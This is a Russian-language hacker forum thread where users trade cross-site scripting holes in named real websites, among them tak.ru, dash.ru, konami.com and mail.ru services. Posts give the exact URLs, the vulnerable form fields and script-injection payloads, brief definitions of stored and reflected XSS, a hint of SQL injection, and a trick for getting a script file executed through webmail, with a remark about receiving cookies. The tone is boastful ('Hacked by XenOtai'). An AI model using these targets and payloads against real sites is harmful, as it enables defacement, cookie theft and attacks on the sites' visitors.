http://emo.nnov.ru/ Очень популярный сайт эморей Уязвимо поле E-mail: Code: [email protected]"><script>alert()</script>
или в томже поле Code: </title><script>alert('xss')</script> и от меня парочка багов ) Code: http://www.hiidlane.ee/index.php?moodul=3&q="><script>alert(/xss/)</script> Code: http://www.turundusinfo.ee/?id=55&search="><script>alert('xss')</script>&search_src=all
Тема нах..не нужная вот если бы вы выкладывали активные xss на таких почтовиках как :rambler.ru, yandex.ru или лучше всего mail.ru то это другое дело....а это все не иначе как МУСОР...не кому нах... не нужный=)))) Пустая трата времни.
Если ты такой умный сам там ищи. К тому же ты наверно слепой, потому что на всех перечисленных тобой сайтах выкладывали уже хсс.
Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы. Т.е. в общем актив это когда уязвимость сохраняется в системе и выдается всем пользователем зашедшим на страницу с уязвимым параметром. Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу. Пассив в общем когда подсовывается ссылка пользователю, содержащая скрипт переданный в уязвимом параметре. Сработает один раз когда пользователь перейдет по специально сформированной ссылке, если же он перейдет на сайт по обычной ссылке, то ничего не произойдет.
Tak.ru При регистрации уязвимы поля Login, ФИО, Email Далее в настройках.... Уязвимы поля Название сайты, ссылка на него... Так вот... На этом сайте зарегистрированны 37к человек и размещают их рекламу на своем сайте.... И...в связи с этим...вы можете поломать множество сайтов...Как? Очень просто..... В панели управления, есть меню типа реклама.. Так вот там можно ставить разделитель рекламы.... Ставим Code: "><script>alert(/xss/)</script> И вот.....хсски на нашем сайте... А почему я сказал что другие сайты можем поломать?? ПОтому что также здесь есть sql-inj, это вы найдете сами =)
ыыыы, какой красивый домен mydak.ru http://www.mydak.ru/today.php Думаю сами знаете что и куда вствлять... на мои хек алерты не обращайте внимания =)
http://dash.ru/ При регистрации указываем маил : На мыло приходит ссылка для активации. http://dash.ru/user/?menu=setup При просмотре профиля или настроек вылезат алерт.
ll.oo.lv Регистрация, изменение профиля.... Уязвимы все поля... Активная xss при просмотре профиля http://ll.oo.lv/?do=prof&user=SnooPI такой вот хек =)
Уязвимы поля First Name и Last Name. Пример запроса: '><script>alert('Hacked%20by%20XenOtai')</script>
mail.ru yandex.ru rambler.ru отправляем сообщение на почту и прикладываем файлик txt со скриптом. если открыть его в ие то вылезет алерт, должно сработать и в опере(не хочу ставить чтобы проверять), а в фф не работает. минус: все что вы напишете в этот файл отобразится в письме(кроме рамблера) на мейле прикрыли. куки норм приходят только на рамблер.
Code: http://www.konami.com/edealinv/servlet/ExecMacro?nurl=control/Registration.vm&ctl_nbr=3810 Уязвимы многие поля, например Company Name и First Name. Пример запроса: "><script>alert('Hacked%20by%20XenOtai')</script>
travel.mail.ru Наводим мышкой на рисунОК Code: http://travel.mail.ru/account_photos_popup.php?account_id=4163847 БуГагага..уже закрыли........10 часов жилаа...ххехехех))) ПРЕВЕД АДМИНАМ МАЙЛА...
